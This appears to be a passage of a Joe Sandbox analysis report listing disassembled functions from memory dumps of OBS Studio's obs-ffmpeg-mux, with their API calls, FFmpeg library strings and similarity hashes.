Opcode ID: 57478434a447384fa94a03ff1bade18b8ff03ea6d8e4a2e89f8b75d2d60d4bc3
Instruction ID: e9e70f69fdf142d84edab2933a21541dec383f7e4c71cca570a0e76b7c6ad6aa
Opcode Fuzzy Hash: 57478434a447384fa94a03ff1bade18b8ff03ea6d8e4a2e89f8b75d2d60d4bc3
Instruction Fuzzy Hash: FD61A261D0E68A66EB609F11B4107FE67A2FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8BFB85520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB855E9
_local_unwind.LIBVCRUNTIME ref: 00007FF8BFB8568C

Strings

MOC, xrefs: 00007FF8BFB85562
csm, xrefs: 00007FF8BFB85584
RCC, xrefs: 00007FF8BFB8556E
csm, xrefs: 00007FF8BFB856D0

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction ID: f86054bcf62643f1762f3efe51d0fa645309f139cc8ae3aaf077c315fe105312
Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction Fuzzy Hash: 23518B76A0964286EB609FA9D84177927A0FFC4BE4F142035EF4C4238BEE3CE841CB41

Function 00007FF8BFB5AC80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8BFB5AD29
av_log.AVUTIL-58 ref: 00007FF8BFB5AD9C

Strings

adding %d audio samples of silence, xrefs: 00007FF8BFB5AD8D

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_logmemset
String ID: adding %d audio samples of silence
API String ID: 1585849880-1798122562
Opcode ID: 43dec4429a85b2510075a362c729a0e6794df002455a30ccca771920209cc6fe
Instruction ID: 45c2fa4628bab721d53bb5d961792b68ed9b39815f0724f5d701f287548af3b8
Opcode Fuzzy Hash: 43dec4429a85b2510075a362c729a0e6794df002455a30ccca771920209cc6fe
Instruction Fuzzy Hash: 6A310122B0826256F755A69AA069FAAA34DFB84BC1F404037DF0CA7BC6CE3CF501C744

Function 00007FF8BFB8D740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8BFB8CE14), ref: 00007FF8BFB8D803
DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8D822

Strings

void, xrefs: 00007FF8BFB8D786
`template-parameter, xrefs: 00007FF8BFB8D830

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction ID: 2749fdc2c3cb853701163d5588712d01b2ae13ccb7c86b426d0034fbdb036696
Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction Fuzzy Hash: 7041F662F08B5698FB009BA9D8512AC23B1BB887C8F54513ADF0D26B6ADF78A545C350

Function 00007FF8BFB88624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB886DB

Strings

,<ellipsis>, xrefs: 00007FF8BFB886B8
..., xrefs: 00007FF8BFB88724
void, xrefs: 00007FF8BFB88759
<ellipsis>, xrefs: 00007FF8BFB88734
,..., xrefs: 00007FF8BFB886A8

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2943138195-2211150622
Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction ID: 6035e0e78a3f2e3320c420f29683b94bc4825167c13c5da257612200709cf266
Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction Fuzzy Hash: B5413772E28B4699FB118FACD8812AC37B0BB88788F548139DB4D12769DF3CE545C740

Function 00007FF8BFB8A31C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A40F

Strings

short , xrefs: 00007FF8BFB8A39C
int , xrefs: 00007FF8BFB8A38D
long , xrefs: 00007FF8BFB8A37E
char , xrefs: 00007FF8BFB8A3A5
unsigned , xrefs: 00007FF8BFB8A3E3

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction ID: d4fc56c2c3a0982fa2afceabd73fe0a28a4f24d9716f8c2718a6473281832526
Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction Fuzzy Hash: EA416A32E18A56A9EB118FACD8441BC7BB5BB89784F448235CB0C16B9ADF3CE544C700

Function 00007FF8A7BEAD20 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7BEAD79

Strings

S, xrefs: 00007FF8A7BEADC6
U, xrefs: 00007FF8A7BEADC0
AMBI, xrefs: 00007FF8A7BEAD2A
R, xrefs: 00007FF8A7BEADD4

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: AMBI$R$S$U
API String ID: 1004003707-1923686996
Opcode ID: 2c03c1ff48f72caf1a01bafe690d171ef4b5263fdc57e4468dab7bf39da5722a
Instruction ID: 474bca973fb646163fbcccd7a7db495ce2484552123f10dd956332fa99ac200d
Opcode Fuzzy Hash: 2c03c1ff48f72caf1a01bafe690d171ef4b5263fdc57e4468dab7bf39da5722a
Instruction Fuzzy Hash: 6521F763E0A54374FB628E24A8002BE1754EB417EAF8C8571DF0D066D0FE7CE586E304

Function 00007FF8A7C01880 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7C0191C

Strings

src/libavutil/imgutils.c, xrefs: 00007FF8A7C01936, 00007FF8A7C01966
((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth, xrefs: 00007FF8A7C01975
((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth, xrefs: 00007FF8A7C01945
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C01951

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy
String ID: ((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth$((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth$Assertion %s failed at %s:%d$src/libavutil/imgutils.c
API String ID: 3510742995-1436408019
Opcode ID: 29eedba0b8a561808ce1373c0d83b9e424659025d8d80de6197fb189af70282f
Instruction ID: 1f206afe899490c055c7987f5a4f8b0e5f6d165d08cb0293052eb4a4bc7ca7c6
Opcode Fuzzy Hash: 29eedba0b8a561808ce1373c0d83b9e424659025d8d80de6197fb189af70282f
Instruction Fuzzy Hash: D221B8A3F0BA5566FB519F11BD001AEA755EB887D8F484132EE4C07755DE3CE286D700

Function 00007FF8A7C0D160 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

false,n,no,disable,disabled,off, xrefs: 00007FF8A7C0D326
auto, xrefs: 00007FF8A7C0D169
true,y,yes,enable,enabled,on, xrefs: 00007FF8A7C0D2C8
Unable to parse option value "%s" as boolean, xrefs: 00007FF8A7C0D3A8

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Unable to parse option value "%s" as boolean$auto$false,n,no,disable,disabled,off$true,y,yes,enable,enabled,on
API String ID: 0-3796170252
Opcode ID: 80dcf72f5eaf96136f939c22b2c5b1b32456b8058e2967939369524f2b68426d
Instruction ID: c7bf6ac9d45c259bc0e6226b54a2bccf252bfc61eba35c983472a883524623d4
Opcode Fuzzy Hash: 80dcf72f5eaf96136f939c22b2c5b1b32456b8058e2967939369524f2b68426d
Instruction Fuzzy Hash: F521A426E0AA02A1FB529F34A4113BE5255EF817E4F504631DD1D272C1EF3CE58BB344

Function 00007FF8A7BF6860 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BF6C25

Part of subcall function 00007FF8A7C89860: strlen.MSVCRT ref: 00007FF8A7C89878
Part of subcall function 00007FF8A7C89860: _errno.MSVCRT ref: 00007FF8A7C89897

_errno.MSVCRT ref: 00007FF8A7BF6C93

Strings

ff_tempfile: Cannot open temporary file %s, xrefs: 00007FF8A7BF6CA2
ff_tempfile: Cannot allocate file name, xrefs: 00007FF8A7BF6CD6
./%sXXXXXX, xrefs: 00007FF8A7BF6C77
/tmp/%sXXXXXX, xrefs: 00007FF8A7BF6C49

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errnostrlen
String ID: ./%sXXXXXX$/tmp/%sXXXXXX$ff_tempfile: Cannot allocate file name$ff_tempfile: Cannot open temporary file %s
API String ID: 860928405-2152079688
Opcode ID: 0f688c71126fc59946a20c54ec96a80db71b419569075c9b5168e78452e7bea4
Instruction ID: 554d6d4822689128d0b5cb1c49dcfd6569caddd15f4f7b818e88794e17999cc0
Opcode Fuzzy Hash: 0f688c71126fc59946a20c54ec96a80db71b419569075c9b5168e78452e7bea4
Instruction Fuzzy Hash: 9F216AB6E0AA06A1EB41DF11E4594BE2364EF84BD8F844536FD9D87391EE3CE406E740

Function 00007FF8A7C01990 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7C019F9
abort.MSVCRT ref: 00007FF8A7C01A3F

Strings

src/libavutil/imgutils.c, xrefs: 00007FF8A7C01A14, 00007FF8A7C01A44
((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth, xrefs: 00007FF8A7C01A53
((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth, xrefs: 00007FF8A7C01A23
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C01A2F

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortmemcpy
String ID: ((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth$((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth$Assertion %s failed at %s:%d$src/libavutil/imgutils.c
API String ID: 985927305-1436408019
Opcode ID: 57f52b22eac4459bf228b66986decd4f74425c1849e3cd511780a932ceefaf11
Instruction ID: e34ebe4c295daf033a61355ad5d7bb04a7c491ddd57f38687f3175505b49587e
Opcode Fuzzy Hash: 57f52b22eac4459bf228b66986decd4f74425c1849e3cd511780a932ceefaf11
Instruction Fuzzy Hash: F1112C62E1B962B6E730DF54A9015BE6790EF893D4F884534EE0C07B52DE3CE545D740

Function 00007FF649AA2370 Relevance: 10.6, APIs: 7, Instructions: 55COMMON

Download Yara Rule

APIs

avcodec_free_context.AVCODEC-60 ref: 00007FF649AA2388
avformat_free_context.AVFORMAT-60 ref: 00007FF649AA23CC

Part of subcall function 00007FF649AA2030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF649AA23A2), ref: 00007FF649AA204A
Part of subcall function 00007FF649AA2030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF649AA23A2), ref: 00007FF649AA2065
Part of subcall function 00007FF649AA2030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF649AA23A2), ref: 00007FF649AA2080
Part of subcall function 00007FF649AA2030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF649AA23A2), ref: 00007FF649AA209B
Part of subcall function 00007FF649AA2030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF649AA23A2), ref: 00007FF649AA20B6

av_free.AVUTIL-58 ref: 00007FF649AA23B1
avio_context_free.AVFORMAT-60 ref: 00007FF649AA23BD
avio_close.AVFORMAT-60 ref: 00007FF649AA23C4
avcodec_free_context.AVCODEC-60 ref: 00007FF649AA2402
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA2415

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strncmp$avcodec_free_context$av_freeavformat_free_contextavio_closeavio_context_freefree
String ID:
API String ID: 1086289117-0
Opcode ID: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
Instruction ID: d09b73dced0ac06b6d8d00c173f4a72818a22e3536c05b6b61eb66c928ea5512
Opcode Fuzzy Hash: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
Instruction Fuzzy Hash: F3215E22A4CA5183EB11FF25E45027D73A0FB85F88F055536DE4E8765ACF38D4968324

Function 00007FF8A7C9A660 Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7C99840: TlsGetValue.KERNEL32 ref: 00007FF8A7C9985D

longjmp.MSVCRT ref: 00007FF8A7C9A69B
TlsGetValue.KERNEL32 ref: 00007FF8A7C9A6A7
CloseHandle.KERNEL32 ref: 00007FF8A7C9A6D3
_endthreadex.MSVCRT ref: 00007FF8A7C9A6EB
CloseHandle.KERNEL32 ref: 00007FF8A7C9A6FD
TlsSetValue.KERNEL32 ref: 00007FF8A7C9A71B
CloseHandle.KERNEL32 ref: 00007FF8A7C9A72E

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 73060f70dbe4c489cd31e19d1776919e8e936670c78b2bffbe7749b2f46d11de
Instruction ID: 5c37742cba82f5de98181c536a1901ace0f9928b41399c3c965dcfee2f15cd4a
Opcode Fuzzy Hash: 73060f70dbe4c489cd31e19d1776919e8e936670c78b2bffbe7749b2f46d11de
Instruction Fuzzy Hash: 0A210725A0BA82E6FB959F11E45877E76A8EF84F85F058135CE0E07390EF7CA844E700

Function 00007FF8A7BED810 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BED85F

Strings

src/libavutil/crc.c, xrefs: 00007FF8A7BED834, 00007FF8A7BED894
av_crc_init(av_crc_table[AV_CRC_32_IEEE_LE], 1, 32, 0xEDB88320, sizeof(av_crc_table[AV_CRC_32_IEEE_LE])) >= 0, xrefs: 00007FF8A7BED83B
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BED84B, 00007FF8A7BED8AB
av_crc_init(av_crc_table[AV_CRC_16_ANSI_LE], 1, 16, 0xA001, sizeof(av_crc_table[AV_CRC_16_ANSI_LE])) >= 0, xrefs: 00007FF8A7BED89B

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$av_crc_init(av_crc_table[AV_CRC_16_ANSI_LE], 1, 16, 0xA001, sizeof(av_crc_table[AV_CRC_16_ANSI_LE])) >= 0$av_crc_init(av_crc_table[AV_CRC_32_IEEE_LE], 1, 32, 0xEDB88320, sizeof(av_crc_table[AV_CRC_32_IEEE_LE])) >= 0$src/libavutil/crc.c
API String ID: 4206212132-3869419772
Opcode ID: 96f5f185df5af9d250496bea1b812434c02eec593cc3f23363683570a2ddd386
Instruction ID: f38f38571cd6612d493c0004daa49bda4b42cbe061eba47249caa1e8e26d7765
Opcode Fuzzy Hash: 96f5f185df5af9d250496bea1b812434c02eec593cc3f23363683570a2ddd386
Instruction Fuzzy Hash: 03116171E0AA46A1F710AF20E8052FE6766EF85384FC04236D94D467A3EE3CE206E714

Function 00007FF8A7C08E40 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 136stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7C08F33

Strings

INT64_MAX, xrefs: 00007FF8A7C0901B
%d.%06d, xrefs: 00007FF8A7C0907B
%d:%02d.%06d, xrefs: 00007FF8A7C08EE2
INT64_MIN, xrefs: 00007FF8A7C09056
%lld:%02d:%02d.%06d, xrefs: 00007FF8A7C08FE4

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
